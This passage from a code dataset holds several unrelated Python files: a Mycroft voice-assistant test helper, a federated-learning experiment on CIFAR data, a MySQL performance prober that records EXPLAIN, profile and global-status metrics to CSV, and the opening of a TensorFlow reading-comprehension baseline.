list()\n timeout_time = time.monotonic() + timeout\n while time.monotonic() < timeout_time:\n for message in bus.get_messages('speak'):\n speak_messages.append(message)\n dialog = message.data.get('meta', {}).get('dialog')\n if dialog in dialogs:\n wait_while_speaking()\n match_found = True\n break\n bus.clear_messages()\n if match_found:\n break\n time.sleep(1)\n\n return match_found, speak_messages\n\n\ndef wait_for_audio_service(context, message_type):\n \"\"\"Wait for audio.service message that matches type provided.\n\n May be play, stop, or pause messages\n\n Args:\n context (behave Context): optional context providing scenario timeout\n message_type (string): final component of bus message in form\n `mycroft.audio.service.{type}\n \"\"\"\n msg_type = 'mycroft.audio.service.{}'.format(message_type)\n\n def check_for_msg(message):\n return message.msg_type == msg_type, ''\n\n passed, debug = then_wait(msg_type, check_for_msg, context)\n\n if not passed:\n debug += mycroft_responses(context)\n if not debug:\n if message_type == 'play':\n message_type = 'start'\n debug = \"Mycroft didn't {} playback\".format(message_type)\n\n assert passed, debug\n","sub_path":"test/integrationtests/voight_kampff/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":11604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599635752","text":"import os\nimport errno\nimport argparse\nimport sys\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.optimizers import Adam\n\nfrom data_utils import load_CIFAR_data, generate_partial_data, generate_bal_private_data\nfrom FedGD import FedGD\nfrom Neural_Networks import train_models, cnn_2layer_fc_model, cnn_3layer_fc_model\nfrom ResNet_v2 import ResNet, build_model\n\ndef parseArg():\n parser = argparse.ArgumentParser(description='FedMD, a federated learning framework. \\\n Participants are training collaboratively. ')\n parser.add_argument('-conf', metavar='conf_file', nargs=1, \n help='the config file for FedMD.'\n )\n\n conf_file = os.path.abspath(\"conf/CIFAR_balance_conf.json\")\n \n if len(sys.argv) > 1:\n args = parser.parse_args(sys.argv[1:])\n if args.conf:\n conf_file = args.conf[0]\n return conf_file\n\n# CANDIDATE_MODELS = {\"2_layer_CNN\": cnn_2layer_fc_model,\n# \"3_layer_CNN\": cnn_3layer_fc_model}\n\nif __name__ == \"__main__\":\n conf_file = parseArg()\n with open(conf_file, \"r\") as f:\n conf_dict = eval(f.read())\n \n #n_classes = conf_dict[\"n_classes\"]\n model_config = conf_dict[\"models\"]\n pre_train_params = conf_dict[\"pre_train_params\"]\n model_saved_dir = conf_dict[\"model_saved_dir\"]\n model_saved_names = conf_dict[\"model_saved_names\"]\n is_early_stopping = conf_dict[\"early_stopping\"]\n public_classes = conf_dict[\"public_classes\"]\n private_classes = conf_dict[\"private_classes\"]\n n_classes = len(public_classes) + len(private_classes)\n \n emnist_data_dir = conf_dict[\"EMNIST_dir\"] \n N_parties = conf_dict[\"N_parties\"]\n N_samples_per_class = conf_dict[\"N_samples_per_class\"]\n \n N_rounds = conf_dict[\"N_rounds\"]\n N_alignment = conf_dict[\"N_alignment\"]\n N_private_training_round = conf_dict[\"N_private_training_round\"]\n private_training_batchsize = conf_dict[\"private_training_batchsize\"]\n N_logits_matching_round = conf_dict[\"N_logits_matching_round\"]\n logits_matching_batchsize = conf_dict[\"logits_matching_batchsize\"]\n \n \n result_save_dir = conf_dict[\"result_save_dir\"]\n\n \n del conf_dict, conf_file\n \n X_train_CIFAR10, y_train_CIFAR10, X_test_CIFAR10, y_test_CIFAR10 \\\n = load_CIFAR_data(data_type=\"CIFAR10\", \n standarized = True, verbose = True)\n \n public_dataset = {\"X\": X_train_CIFAR10, \"y\": y_train_CIFAR10}\n\n X_train_CIFAR100, y_train_CIFAR100, X_test_CIFAR100, y_test_CIFAR100 \\\n = load_CIFAR_data(data_type=\"CIFAR100\",\n standarized = True, verbose = True)\n \n # only use those CIFAR100 data whose y_labels belong to private_classes\n X_train_CIFAR100, y_train_CIFAR100 \\\n = generate_partial_data(X = X_train_CIFAR100, y= y_train_CIFAR100,\n class_in_use = private_classes,\n verbose = True)\n \n \n X_test_CIFAR100, y_test_CIFAR100 \\\n = generate_partial_data(X = X_test_CIFAR100, y= y_test_CIFAR100,\n class_in_use = private_classes,\n verbose = True)\n \n # relabel the selected CIFAR100 data for future convenience\n for index, cls_ in enumerate(private_classes):\n print(index, cls_)\n # print(y_train_CIFAR100 == cls_, len(y_train_CIFAR100 == cls_))\n y_train_CIFAR100[y_train_CIFAR100 == cls_] = index + len(public_classes)\n print(y_train_CIFAR100[y_train_CIFAR100 == index + len(public_classes)])\n y_test_CIFAR100[y_test_CIFAR100 == cls_] = index + len(public_classes)\n del index, cls_\n \n print(pd.Series(y_train_CIFAR100).value_counts())\n mod_private_classes = np.arange(len(private_classes)) + len(public_classes)\n # mod_private_classes = [10,11,12,13,14,15]\n \n print(\"=\"*60)\n #generate private data\n private_data, total_private_data\\\n =generate_bal_private_data(X_train_CIFAR100, y_train_CIFAR100, \n N_parties = N_parties, \n classes_in_use = mod_private_classes, \n N_samples_per_class = N_samples_per_class, \n data_overlap = False)\n print(\"=\"*60)\n X_tmp, y_tmp = generate_partial_data(X = X_test_CIFAR100, y= y_test_CIFAR100,\n class_in_use = mod_private_classes, \n verbose = True)\n private_test_data = {\"X\": X_tmp, \"y\": y_tmp}\n del X_tmp, y_tmp\n \n parties = []\n if model_saved_dir is None:\n parties = build_model(input_shape=(32,32,3), n_classes=n_classes, n_parties=N_parties)\n\n pre_train_result = train_models(parties, \n X_train_CIFAR10, y_train_CIFAR10, \n X_test_CIFAR10, y_test_CIFAR10,\n save_dir = model_saved_dir, save_names = model_saved_names,\n early_stopping = is_early_stopping,\n **pre_train_params\n )\n else:\n dpath = os.path.abspath(model_saved_dir)\n model_names = os.listdir(dpath)\n for name in model_names:\n tmp = None\n tmp = load_model(os.path.join(dpath ,name))\n parties.append(tmp)\n \n del X_train_CIFAR10, y_train_CIFAR10, X_test_CIFAR10, y_test_CIFAR10, \\\n X_train_CIFAR100, y_train_CIFAR100, X_test_CIFAR100, y_test_CIFAR100,\n \n fedgd = FedGD(parties, \n public_dataset = public_dataset,\n private_data = private_data, \n total_private_data = total_private_data,\n private_test_data = private_test_data,\n N_rounds = N_rounds,\n N_alignment = N_alignment, \n N_logits_matching_round = N_logits_matching_round,\n logits_matching_batchsize = logits_matching_batchsize, \n N_private_training_round = N_private_training_round, \n private_training_batchsize = private_training_batchsize)\n \n initialization_result = fedgd.init_result\n # pooled_train_result = fedgd.pooled_train_result\n \n collaboration_performance, collaboration_loss, record_generator_result = fedgd.collaborative_training()\n \n if result_save_dir is not None:\n save_dir_path = os.path.abspath(result_save_dir)\n #make dir\n try:\n os.makedirs(save_dir_path)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise \n \n \n with open(os.path.join(save_dir_path, 'pre_train_result.pkl'), 'wb') as f:\n pickle.dump(pre_train_result, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(os.path.join(save_dir_path, 'init_result.pkl'), 'wb') as f:\n pickle.dump(initialization_result, f, protocol=pickle.HIGHEST_PROTOCOL)\n # with open(os.path.join(save_dir_path, 'pooled_train_result.pkl'), 'wb') as f:\n # pickle.dump(pooled_train_result, f, protocol=pickle.HIGHEST_PROTOCOL)\n #with open(os.path.join(save_dir_path, 'col_performance_fedGD_'+str(N_rounds)+'_'+str(N_alignment)+'_'+str(N_samples_per_class*6)+'.pkl'), 'wb') as f:\n # pickle.dump(collaboration_performance, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(os.path.join(save_dir_path, 'col_performance_fedGD_' + str(N_logits_matching_round) + '_'\n + str(N_private_training_round) + '_'\n + str(N_rounds) + '_'\n + str(N_alignment) + '_'\n + str(N_samples_per_class * 6) + '.pkl'), 'wb') as f:\n pickle.dump(collaboration_performance, f, protocol=pickle.HIGHEST_PROTOCOL)\n","sub_path":"CIFAR_ResNet.py","file_name":"CIFAR_ResNet.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"514630459","text":"import utils.myLogger\nimport drivers.mysqldriver as mysql\nimport config.config\nimport multiprocessing\nimport csv\nimport time\nimport signal\n\nPROBE_SQL_LIST=[\n # \"select FIELD_07, sum(1) from TEST group by FIELD_07;\",\n # \"select * from (select * from (select * from (select * from TEST order by FIELD_09)as K order by FIELD_08) as a join (select FIELD_07 as FFIELD_07, FIELD_08 as FFIELD_08, FIELD_09 as FFIELD_09 from TEST) as b where a.FIELD_08=b.FFIELD_08) as c ORDER BY FIELD_09 LIMIT 10;\"\n]\n\nheaders = [\n 'plan', 'rowScan', 'rowOut', \n \n 'startTime', 'oTableTime', 'cTableTime', 'transHookTime', 'lockTime', 'initTime',\n 'optimizeTime', 'statTime', 'prepareTime', 'execTime', 'endTime','qEndTime', \n 'commitTime', 'crTmpTime', 'rmTmpTime', 'freeTime', 'cleanTime', \n\n 'Aborted_clients', 'Aborted_connects','Bytes_received','Bytes_sent','Connections',\n 'Com_insert','Com_rollback','Com_select','Com_set_option', 'Com_update','Com_delete',\n 'Binlog_cache_use','Binlog_cache_disk_use','Created_tmp_files','Created_tmp_tables','Error_log_buffered_bytes','Flush_commands',\n\n 'Handler_commit', 'Handler_delete', 'Handler_external_lock', 'Handler_mrr_init', \n 'Handler_prepare', 'Handler_read_first', 'Handler_read_key', 'Handler_read_last',\n 'Handler_read_next', 'Handler_read_rnd_next', 'Handler_rollback', 'Handler_update',\n 'Handler_write', \n\n 'Innodb_buffer_pool_pages_data', 'Innodb_buffer_pool_pages_dirty', 'Innodb_buffer_pool_pages_flushed', 'Innodb_buffer_pool_pages_free', 'Innodb_buffer_pool_pages_misc', 'Innodb_buffer_pool_pages_total', 'Innodb_buffer_pool_read_requests', 'Innodb_buffer_pool_reads', 'Innodb_buffer_pool_read_ahead_rnd', 'Innodb_buffer_pool_read_ahead', 'Innodb_buffer_pool_read_ahead_evicted', \n\n 'Innodb_data_fsyncs', 'Innodb_data_read', 'Innodb_data_reads', 'Innodb_data_writes', 'Innodb_data_written', 'Innodb_data_writes', 'Innodb_dblwr_pages_written', 'Innodb_dblwr_writes', \n\n 'Innodb_log_write_requests','Innodb_log_writes','Innodb_os_log_written','Innodb_pages_created','Innodb_pages_read','Innodb_page_size','Innodb_pages_written', \n \n 'Innodb_row_lock_time','Innodb_row_lock_time_avg','Innodb_row_lock_time_max','Innodb_row_lock_waits',\n\n 'Innodb_rows_deleted', 'Innodb_rows_inserted', 'Innodb_rows_read', 'Innodb_rows_updated', \n\n 'Open_tables', 'Opened_tables', 'Queries', 'Questions', \n\n 'Select_full_join', 'Select_full_range_join', 'Select_range', 'Select_scan', 'Sort_rows', 'Sort_range', 'Sort_scan', \n\n 'Table_open_cache_hits', 'Table_open_cache_misses', 'Table_open_cache_overflows', 'Threads_cached', 'Threads_connected', 'Threads_created',\n\n 'status_time', 'totalTime','timestamp'\n ]\nmysql = mysql.MysqlDriver()\nlogger = utils.myLogger.getCMDLogger()\n\n# 解析两次status形成输出\ndef parseStatus(resp1, resp2, time):\n dictTemp1 = {}\n dictTemp2 = {}\n dictStatus = {}\n for i in range(0,len(resp1)):\n dictTemp1[resp1[i]['Variable_name']] = resp1[i]['Value']\n for i in range(0,len(resp2)):\n dictTemp2[resp2[i]['Variable_name']] = resp2[i]['Value']\n \n dictStatus['Aborted_clients'] = int(dictTemp2['Aborted_clients']) - int(dictTemp1['Aborted_clients'])\n dictStatus['Aborted_connects'] = int(dictTemp2['Aborted_connects']) - int(dictTemp1['Aborted_connects'])\n dictStatus['Bytes_received'] = int(dictTemp2['Bytes_received']) - int(dictTemp1['Bytes_received'])\n dictStatus['Bytes_sent'] = int(dictTemp2['Bytes_sent']) - int(dictTemp1['Bytes_sent'])\n dictStatus['Connections'] = int(dictTemp2['Connections']) - int(dictTemp1['Connections'])\n \n dictStatus['Com_insert'] = int(dictTemp2['Com_insert']) - int(dictTemp1['Com_insert'])\n dictStatus['Com_rollback'] = int(dictTemp2['Com_rollback']) - int(dictTemp1['Com_rollback'])\n dictStatus['Com_select'] = int(dictTemp2['Com_select']) - int(dictTemp1['Com_select'])\n dictStatus['Com_set_option'] = int(dictTemp2['Com_set_option']) - int(dictTemp1['Com_set_option'])\n dictStatus['Com_update'] = int(dictTemp2['Com_update']) - int(dictTemp1['Com_update'])\n dictStatus['Com_delete'] = int(dictTemp2['Com_delete']) - int(dictTemp1['Com_delete'])\n \n dictStatus['Binlog_cache_use'] = int(dictTemp2['Binlog_cache_use']) - int(dictTemp1['Binlog_cache_use'])\n dictStatus['Binlog_cache_disk_use'] = int(dictTemp2['Binlog_cache_disk_use']) - int(dictTemp1['Binlog_cache_disk_use'])\n dictStatus['Created_tmp_files'] = int(dictTemp2['Created_tmp_files']) - int(dictTemp1['Created_tmp_files'])\n dictStatus['Created_tmp_tables'] = int(dictTemp2['Created_tmp_tables']) - int(dictTemp1['Created_tmp_tables'])\n dictStatus['Error_log_buffered_bytes'] = int(dictTemp2['Error_log_buffered_bytes']) - int(dictTemp1['Error_log_buffered_bytes'])\n dictStatus['Flush_commands'] = int(dictTemp2['Flush_commands']) - int(dictTemp1['Flush_commands'])\n \n dictStatus['Handler_commit'] = int(dictTemp2['Handler_commit']) - int(dictTemp1['Handler_commit'])\n dictStatus['Handler_delete'] = int(dictTemp2['Handler_delete']) - int(dictTemp1['Handler_delete'])\n dictStatus['Handler_external_lock'] = int(dictTemp2['Handler_external_lock']) - int(dictTemp1['Handler_external_lock'])\n dictStatus['Handler_mrr_init'] = int(dictTemp2['Handler_mrr_init']) - int(dictTemp1['Handler_mrr_init'])\n dictStatus['Handler_prepare'] = int(dictTemp2['Handler_prepare']) - int(dictTemp1['Handler_prepare'])\n dictStatus['Handler_read_first'] = int(dictTemp2['Handler_read_first']) - int(dictTemp1['Handler_read_first'])\n dictStatus['Handler_read_key'] = int(dictTemp2['Handler_read_key']) - int(dictTemp1['Handler_read_key'])\n dictStatus['Handler_read_last'] = int(dictTemp2['Handler_read_last']) - int(dictTemp1['Handler_read_last'])\n dictStatus['Handler_read_next'] = int(dictTemp2['Handler_read_next']) - int(dictTemp1['Handler_read_next'])\n dictStatus['Handler_read_rnd_next'] = int(dictTemp2['Handler_read_rnd_next']) - int(dictTemp1['Handler_read_rnd_next'])\n dictStatus['Handler_rollback'] = int(dictTemp2['Handler_rollback']) - int(dictTemp1['Handler_rollback'])\n dictStatus['Handler_update'] = int(dictTemp2['Handler_update']) - int(dictTemp1['Handler_update'])\n dictStatus['Handler_write'] = int(dictTemp2['Handler_write']) - int(dictTemp1['Handler_write'])\n \n dictStatus['Innodb_buffer_pool_pages_data'] = int(dictTemp2['Innodb_buffer_pool_pages_data']) - int(dictTemp1['Innodb_buffer_pool_pages_data'])\n dictStatus['Innodb_buffer_pool_pages_dirty'] = int(dictTemp2['Innodb_buffer_pool_pages_dirty']) - int(dictTemp1['Innodb_buffer_pool_pages_dirty'])\n dictStatus['Innodb_buffer_pool_pages_flushed'] = int(dictTemp2['Innodb_buffer_pool_pages_flushed']) - int(dictTemp1['Innodb_buffer_pool_pages_flushed'])\n dictStatus['Innodb_buffer_pool_pages_free'] = int(dictTemp2['Innodb_buffer_pool_pages_free']) - int(dictTemp1['Innodb_buffer_pool_pages_free'])\n dictStatus['Innodb_buffer_pool_pages_misc'] = int(dictTemp2['Innodb_buffer_pool_pages_misc']) - int(dictTemp1['Innodb_buffer_pool_pages_misc'])\n dictStatus['Innodb_buffer_pool_pages_total'] = int(dictTemp2['Innodb_buffer_pool_pages_total'])\n dictStatus['Innodb_buffer_pool_read_requests'] = int(dictTemp2['Innodb_buffer_pool_read_requests']) - int(dictTemp1['Innodb_buffer_pool_read_requests'])\n dictStatus['Innodb_buffer_pool_reads'] = int(dictTemp2['Innodb_buffer_pool_reads']) - int(dictTemp1['Innodb_buffer_pool_reads'])\n dictStatus['Innodb_buffer_pool_read_ahead_rnd'] = int(dictTemp2['Innodb_buffer_pool_read_ahead_rnd']) - int(dictTemp1['Innodb_buffer_pool_read_ahead_rnd'])\n dictStatus['Innodb_buffer_pool_read_ahead'] = int(dictTemp2['Innodb_buffer_pool_read_ahead']) - int(dictTemp1['Innodb_buffer_pool_read_ahead'])\n dictStatus['Innodb_buffer_pool_read_ahead_evicted'] = int(dictTemp2['Innodb_buffer_pool_read_ahead_evicted']) - int(dictTemp1['Innodb_buffer_pool_read_ahead_evicted'])\n \n dictStatus['Innodb_data_fsyncs'] = int(dictTemp2['Innodb_data_fsyncs']) - int(dictTemp1['Innodb_data_fsyncs'])\n dictStatus['Innodb_data_read'] = int(dictTemp2['Innodb_data_read']) - int(dictTemp1['Innodb_data_read'])\n dictStatus['Innodb_data_reads'] = int(dictTemp2['Innodb_data_reads']) - int(dictTemp1['Innodb_data_reads'])\n dictStatus['Innodb_data_writes'] = int(dictTemp2['Innodb_data_writes']) - int(dictTemp1['Innodb_data_writes'])\n dictStatus['Innodb_data_written'] = int(dictTemp2['Innodb_data_written']) - int(dictTemp1['Innodb_data_written'])\n dictStatus['Innodb_data_writes'] = int(dictTemp2['Innodb_data_writes']) - int(dictTemp1['Innodb_data_writes'])\n dictStatus['Innodb_dblwr_pages_written'] = int(dictTemp2['Innodb_dblwr_pages_written']) - int(dictTemp1['Innodb_dblwr_pages_written'])\n dictStatus['Innodb_dblwr_writes'] = int(dictTemp2['Innodb_dblwr_writes']) - int(dictTemp1['Innodb_dblwr_writes'])\n \n dictStatus['Innodb_log_write_requests'] = int(dictTemp2['Innodb_log_write_requests']) - int(dictTemp1['Innodb_log_write_requests'])\n dictStatus['Innodb_log_writes'] = int(dictTemp2['Innodb_log_writes']) - int(dictTemp1['Innodb_log_writes'])\n dictStatus['Innodb_os_log_written'] = int(dictTemp2['Innodb_os_log_written']) - int(dictTemp1['Innodb_os_log_written'])\n dictStatus['Innodb_pages_created'] = int(dictTemp2['Innodb_pages_created']) - int(dictTemp1['Innodb_pages_created'])\n dictStatus['Innodb_pages_read'] = int(dictTemp2['Innodb_pages_read']) - int(dictTemp1['Innodb_pages_read'])\n dictStatus['Innodb_page_size'] = int(dictTemp2['Innodb_page_size'])\n dictStatus['Innodb_pages_written'] = int(dictTemp2['Innodb_pages_written']) - int(dictTemp1['Innodb_pages_written'])\n\n dictStatus['Innodb_row_lock_time'] = int(dictTemp2['Innodb_row_lock_time']) - int(dictTemp1['Innodb_row_lock_time'])\n dictStatus['Innodb_row_lock_time_avg'] = int(dictTemp2['Innodb_row_lock_time_avg'])\n dictStatus['Innodb_row_lock_time_max'] = int(dictTemp2['Innodb_row_lock_time_max'])\n dictStatus['Innodb_row_lock_waits'] = int(dictTemp2['Innodb_row_lock_waits']) - int(dictTemp1['Innodb_row_lock_waits'])\n \n dictStatus['Innodb_rows_deleted'] = int(dictTemp2['Innodb_rows_deleted']) - int(dictTemp1['Innodb_rows_deleted'])\n dictStatus['Innodb_rows_inserted'] = int(dictTemp2['Innodb_rows_inserted']) - int(dictTemp1['Innodb_rows_inserted'])\n dictStatus['Innodb_rows_read'] = int(dictTemp2['Innodb_rows_read']) - int(dictTemp1['Innodb_rows_read'])\n dictStatus['Innodb_rows_updated'] = int(dictTemp2['Innodb_rows_updated']) - int(dictTemp1['Innodb_rows_updated'])\n \n dictStatus['Open_tables'] = int(dictTemp2['Open_tables']) - int(dictTemp1['Open_tables'])\n dictStatus['Opened_tables'] = int(dictTemp2['Opened_tables']) - int(dictTemp1['Opened_tables'])\n \n dictStatus['Queries'] = int(dictTemp2['Queries']) - int(dictTemp1['Queries'])\n dictStatus['Questions'] = int(dictTemp2['Questions']) - int(dictTemp1['Questions'])\n\n dictStatus['Select_full_join'] = int(dictTemp2['Select_full_join']) - int(dictTemp1['Select_full_join'])\n dictStatus['Select_full_range_join'] = int(dictTemp2['Select_full_range_join']) - int(dictTemp1['Select_full_range_join'])\n dictStatus['Select_range'] = int(dictTemp2['Select_range']) - int(dictTemp1['Select_range'])\n dictStatus['Select_scan'] = int(dictTemp2['Select_scan']) - int(dictTemp1['Select_scan'])\n dictStatus['Sort_rows'] = int(dictTemp2['Sort_rows']) - int(dictTemp1['Sort_rows'])\n dictStatus['Sort_range'] = int(dictTemp2['Sort_range']) - int(dictTemp1['Sort_range'])\n dictStatus['Sort_scan'] = int(dictTemp2['Sort_scan']) - int(dictTemp1['Sort_scan'])\n \n dictStatus['Table_open_cache_hits'] = int(dictTemp2['Table_open_cache_hits']) - int(dictTemp1['Table_open_cache_hits'])\n dictStatus['Table_open_cache_misses'] = int(dictTemp2['Table_open_cache_misses']) - int(dictTemp1['Table_open_cache_misses'])\n dictStatus['Table_open_cache_overflows'] = int(dictTemp2['Table_open_cache_overflows']) - int(dictTemp1['Table_open_cache_overflows'])\n \n dictStatus['Threads_cached'] = int(dictTemp2['Threads_cached']) - int(dictTemp1['Threads_cached'])\n dictStatus['Threads_connected'] = int(dictTemp2['Threads_connected']) - int(dictTemp1['Threads_connected'])\n dictStatus['Threads_created'] = int(dictTemp2['Threads_created']) - int(dictTemp1['Threads_created'])\n\n dictStatus['status_time'] = time\n return dictStatus\n\n\n# 把explain语句中的信息解析出来\n# 输出扫描行数和结果行数\ndef parseExplain(resp):\n dictExplain = {}\n rowsScan = 0\n rowsOut = 0\n plan = ''\n # logger.debug(resp)\n for i in range(0,len(resp)):\n dictExplain = resp[i]\n for k, v in dictExplain.items():\n if v == None:\n dictExplain[k] = 'None'\n rowsScan = rowsScan + dictExplain.get('rows')\n rowsOut = rowsOut + dictExplain.get('rows') * dictExplain.get('filtered')/100\n if plan!='':\n plan = plan + \"+\" + str(dictExplain.get('id')) + \"-\" + dictExplain.get('select_type') + \"-\" + dictExplain.get('table') + \"-\" + dictExplain.get('type') + \"-\" + dictExplain.get('key') + \"-\" + dictExplain.get('Extra').replace(' ','')\n else:\n plan = str(dictExplain.get('id')) + \"-\" + dictExplain.get('select_type') + \"-\" + dictExplain.get('table') + \"-\" + dictExplain.get('type') + \"-\" + dictExplain.get('key') + \"-\" + dictExplain.get('Extra').replace(' ','')\n dictExplain['rowsScan'] = rowsScan\n dictExplain['rowsOut'] = rowsOut\n dictExplain['plan'] = plan\n return dictExplain\n\n\n# 把Profile中的信息解析成字典输出\ndef parseProfile(resp):\n dictProfile = {}\n total = 0\n for i in range(0,len(resp)):\n try:\n dictProfile[resp[i]['Status']] = resp[i]['Duration'] + dictProfile[resp[i]['Status']]\n except: \n dictProfile[resp[i]['Status']] = resp[i]['Duration']\n total = total + resp[i]['Duration']\n dictProfile['totalTime'] = total\n return dictProfile\n\n\n# 分析当前数据库环境,执行sql并生成相应的sql分析\n# 生成结果压入队列,k为对应名称,v为对应值\ndef probe(i, queue):\n sql = PROBE_SQL_LIST[i]\n conn, cursor = mysql.getCursor()\n try:\n # 记录explain结果\n explainSql = \"explain \" + sql\n cursor.execute(explainSql)\n explainResp = cursor.fetchall()\n\n cursor.execute(\"show global status\")\n statusResp1 = cursor.fetchall()\n statusTimeBegin = time.time()\n\n # 记录profile结果\n cursor.execute(\"SET profiling=1;\")\n cursor.execute(sql)\n cursor.execute(\"show profile;\")\n profileResp = cursor.fetchall()\n\n statusTimeEnd = time.time()\n cursor.execute(\"show global status\")\n statusResp2 = cursor.fetchall()\n \n\n statusTime = statusTimeEnd - statusTimeBegin\n\n # 打包所有结果\n result_packer(i, statusResp1, statusResp2, explainResp, profileResp, statusTime, queue)\n except Exception:\n logger.debug(Exception.with_traceback())\n conn.rollback()\n finally:\n conn.close()\n cursor.close()\n\n\n# 打包器\ndef result_packer(i, statusResp1, statusResp2, explainResp, profileResp, statusTime, queue):\n result = {}\n content = {}\n\n dictStatus = parseStatus(statusResp1, statusResp2, statusTime)\n content = dictStatus\n\n dictExplain = parseExplain(explainResp)\n content['timestamp'] = time.time()\n content['plan'] = dictExplain['plan']\n content['rowScan'] = dictExplain['rowsScan']\n content['rowOut'] = dictExplain['rowsOut']\n \n dictProfile = parseProfile(profileResp)\n content['totalTime'] = dictProfile['totalTime']\n content['lockTime'] = dictProfile['System lock']\n content['startTime'] = dictProfile['starting']\n content['transHookTime'] = dictProfile['Executing hook on transaction ']\n content['oTableTime'] = dictProfile['Opening tables']\n content['initTime'] = dictProfile['init']\n\n content['optimizeTime'] = dictProfile['optimizing']\n content['statTime'] = dictProfile['statistics']\n content['prepareTime'] = dictProfile['preparing']\n content['execTime'] = dictProfile['executing']\n content['endTime'] = dictProfile['end']\n content['qEndTime'] = dictProfile['query end']\n content['commitTime'] = dictProfile['waiting for handler commit']\n content['rmTmpTime'] = dictProfile['removing tmp table']\n content['crTmpTime'] = dictProfile['Creating tmp table']\n content['cTableTime'] = dictProfile['closing tables']\n content['freeTime'] = dictProfile['freeing items']\n content['cleanTime'] = dictProfile['cleaning up']\n\n result['id'] = i\n result['content'] = content\n queue.put(result)\n\n\n# 把result字典保存至num对应的文件/数据库中\ndef save_result(queue):\n logger.info(\"Probe Writer Started!!\")\n while True:\n try:\n result = queue.get()\n cont_id = result['id']\n cont = result['content']\n filename = config.config.PROBE_FILE_PREFIX + str(cont_id) + config.config.PROBE_FILE_SUFFIX\n cont_in = []\n for rowname in headers:\n try:\n temp = cont[rowname]\n except KeyError:\n temp = ''\n cont_in.append(temp)\n # logger.debug(cont_in)\n with open(filename, 'a') as f:\n f_csv = csv.writer(f)\n f_csv.writerow(cont_in)\n except KeyboardInterrupt:\n logger.warn(\"Probe Writer Terminated!!\")\n break\n\n\n# 定期执行相应的\ndef workflow_probe(i, queue):\n counter = 0\n while True:\n try:\n process = multiprocessing.Process(target=probe, args=(i, queue, ))\n process.start()\n counter = counter + 1\n logger.info(\"Probe of query \" + str(i) + \" has been executed for \" + str(counter) + \" times.\")\n time.sleep(config.config.PROBE_INTERNAL_TIME)\n except KeyboardInterrupt:\n process.terminate()\n logger.warn(\"Probe of Query \"+ str(i) +\" Terminated!!\")\n break\n\n\n# 根据probe-list,调用相应的work-flow-probe,并管理各个workflow优雅退出。\ndef probe_monitor():\n record = []\n flag = True\n queue = multiprocessing.Queue()\n processW = multiprocessing.Process(target=save_result, args=(queue, ))\n processW.start()\n record.append(processW)\n for i in range(len(PROBE_SQL_LIST)):\n # 初始化对应的csv文件\n filename = config.config.PROBE_FILE_PREFIX + str(i) + config.config.PROBE_FILE_SUFFIX\n with open(filename, 'w') as f:\n f_csv = csv.writer(f)\n f_csv.writerow(headers)\n # 启动workflow\n process = multiprocessing.Process(target=workflow_probe, args=(i, queue, ))\n process.start()\n record.append(process)\n logger.info(\"Prober of Query \"+ str(i) + \" started!\")\n try:\n time.sleep(config.config.PROBE_TIME_BETWEEN_SQL)\n except KeyboardInterrupt:\n queue.close()\n for p in record:\n p.terminate()\n p.join()\n time.sleep(0.01)\n logger.warn(\"Probe Monitor Terminated!!\")\n flag = False\n break\n while flag:\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n queue.close()\n for p in record:\n p.terminate()\n p.join()\n time.sleep(0.01)\n break\n \n logger.warn(\"Probe Monitor Terminated!!\")\n","sub_path":"YCSB/prober/mysqlprober.py","file_name":"mysqlprober.py","file_ext":"py","file_size_in_byte":19633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586467748","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport time\nfrom itertools import chain\nfrom collections import Counter\n\nimport numpy as np\nimport tensorflow as tf\nfrom six.moves import range, reduce\nfrom sklearn import metrics\n\nfrom data_utils import load_data\n\n\ntimestamp = str(int(time.time()))\n\ntf.flags.DEFINE_string(\"baseline\", \"corpus\", \"corpus or context\")\ntf.flags.DEFINE_string(\"data\", \"cbt\", \"The data set (i.e., CBT, SQuAD).\")\ntf.flags.DEFINE_float(\"training_percentage\", 1.0, \"The percentage of the training data set to use.\")\ntf.flags.DEFINE_float(\"testing_percentage\", 1.0, \"The percentage of the testing data set to use.\")\ntf.flags.DEFINE_string(\"memory_representation\", \"sentence\", \"Memory representation of memory (i.e., sentence, window).\")\ntf.flags.DEFINE_integer(\"window_size\", 5, \"Size of a memory slot in a window-level memory.\")\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\ntf.flags.DEFINE_boolean(\"debug_mode\", False, \"Activate debug mode, which prints some info about the model.\")\n\nFLAGS = tf.flags.FLAGS\n\n# Verify the validity of given parameters\nassert FLAGS.data in ['cbt', 'squad', 'cnn'], 'Wrong input for data: {} given, cbt, squad or cnn expected.'.format(FLAGS.data)\nassert 0 < FLAGS.training_percentage <= 1, 'Wrong input for training_percentage: {} given, a value in (0 ; 1] expected.'.format(FLAGS.training_percentage)\nassert 0 < FLAGS.testing_percentage <= 1, 'Wrong input for testing_percentage: {} given, a value in (0 ; 1] expected.'.format(FLAGS.testing_percentage)\n\ndata_set = {'cbt': 'CBTest', 'squad': 'SQuAD', 'cnn': 'cnn'}\npath = \"results0/{}/xxx/\".format(data_set[FLAGS.data])\nlog_dir = path.replace('xxx', 'logs', 1)\n\n# Name of the logs file\nlog_file = \"{}log_{}.txt\".format(log_dir, timestamp)\n# Configuration of the logging system\nlogging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s %(message)s')\nlogger = logging.getLogger(__name__)\n\n# Name of the parameters file\nparam_output_file = \"{}params_{}.csv\".format(log_dir, timestamp)\n\nFLAGS._parse_flags()\nlogger.info(\"Parameters:\")\nwith open(param_output_file, 'w') as f:\n for attr, value in sorted(FLAGS.__flags.items()):\n line = \"{}={}\".format(attr.upper(), value)\n f.write(line + '\\n')\n logger.info(line)\n logger.info(\"\")\n\nlogger.info(\"Started Program\")\n\n# Data\ntrain, test = load_data(FLAGS.data,\n 